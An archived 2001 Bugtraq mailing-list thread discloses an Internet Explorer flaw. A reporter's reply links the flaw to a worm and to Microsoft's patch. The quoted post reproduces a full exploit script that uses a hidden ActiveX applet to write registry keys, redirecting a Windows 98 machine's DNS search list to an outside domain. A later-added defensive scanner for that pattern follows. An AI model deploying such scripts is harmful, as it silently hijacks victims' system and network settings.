[22456] in bugtraq
RE: javascript can write anything to windows98 registry
daemon@ATHENA.MIT.EDU (Rob Lemos)
Wed Aug 29 17:56:20 2001
Message-ID: <3482305AF0F6CF469ED45C0D48FAFCF70B5F3884@cnet10.cnet.cnwk>
From: Rob Lemos <rlemos@zdnet.com>
To: "Marcin Jackowski" <marcin@jackowski.net>
Cc: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Wed, 29 Aug 2001 08:33:21 -0700
This is the basis for the Trojan.Offensive worm. The problem was originally discovered almost a year ago and was patched last November.
Here's the Microsoft link: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-075.asp
And my article: http://news.cnet.com/news/0-1003-200-6961705.html
-R
Robert Lemos
Senior writer -- Security, Privacy and e-Crime
ZDNet News/CNet News.com
PGP key: 0x6E1966EB
> -----Original Message-----
> From: "Marcin Jackowski" <marcin@jackowski.net>
> Sent: Tuesday, August 28, 2001 8:21 AM
> To: bugtraq@securityfocus.com
> Subject: javascript can write anything to windows98 registry
>
> Here's code from
> www.4y4y.net:88/ls.html
> It can write any value to the Windows 98 registry.
> Solution: disable JavaScript in Internet Explorer.
> Tested on IE5.5.
> Marcin Jackowski
> ---------------------------------------------------------------
> <script>
> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
> function yuzi3(){
> try{
> a1=document.applets[0];
> a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> a1.createInstance();Shl = a1.GetObject();
> a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> try{
> Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
> }
> catch(e){}
> }
> catch(e){}
> }
> setTimeout("yuzi3()",1000);
> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
> function yuzi2(){
> try{
> a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> a2.createInstance();Shl = a2.GetObject();
> a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> try{
> Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
> }
> catch(e){}
> }
> catch(e){}
> }setTimeout("yuzi2()",1000);
> </script>
>
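
A defensive check for the pattern in the quoted script, added here as an example and not part of the original thread: it scans page source for the hidden `com.ms.activeX.ActiveXComponent` applet, `setCLSID` calls and `RegWrite` targets, and reports which registry keys the page tries to write. The name `scanPage`, the verdict labels and the sample input are constructed for illustration.

```javascript
// Added example: static scan of page source for the applet/RegWrite pattern
// in the quoted script. SAMPLE is constructed, not captured traffic.
const SAMPLE = [
  '<script>',
  'document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");',
  'function f(){ try{ a=document.applets[0];',
  'a.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");',
  'a.createInstance(); S=a.GetObject();',
  'S.RegWrite("HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VxD\\\\MSTCP\\\\EnableDns","1");',
  '}catch(e){} }',
  '</script>'
].join('\n');

const APPLET_RE = /<applet\b[^>]*\bcode\s*=\s*["']?com\.ms\.activeX\.ActiveXComponent/i;
const CLSID_RE = /\.setCLSID\(\s*["']\{([0-9A-Fa-f-]{36})\}["']\s*\)/g;
// First string argument of RegWrite, honouring backslash escapes.
const REGWRITE_RE = /\.RegWrite\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1/g;

// scanPage is a hypothetical helper name; verdict labels are this example's own.
function scanPage(html) {
  const applet = APPLET_RE.test(html);
  const clsids = [...new Set([...html.matchAll(CLSID_RE)].map(m => m[1].toUpperCase()))];
  const regWrites = [...html.matchAll(REGWRITE_RE)].map(m => {
    // Undo JavaScript string escaping and any line wrapping inside the key.
    const key = m[2].replace(/\\(.)/g, '$1').replace(/[\r\n]+/g, '');
    return { key, machineWide: /^(HKLM|HKEY_LOCAL_MACHINE)\\/i.test(key) };
  });
  let verdict = 'clean';
  if (applet || clsids.length || regWrites.length) verdict = 'review';
  // The applet together with a registry write is the combination the post describes.
  if (applet && regWrites.length) verdict = 'block';
  return { applet, clsids, regWrites, verdict };
}

console.log(scanPage(SAMPLE).verdict);
```

A static scan like this only catches literal occurrences; it complements, and does not replace, the patch referenced in MS00-075.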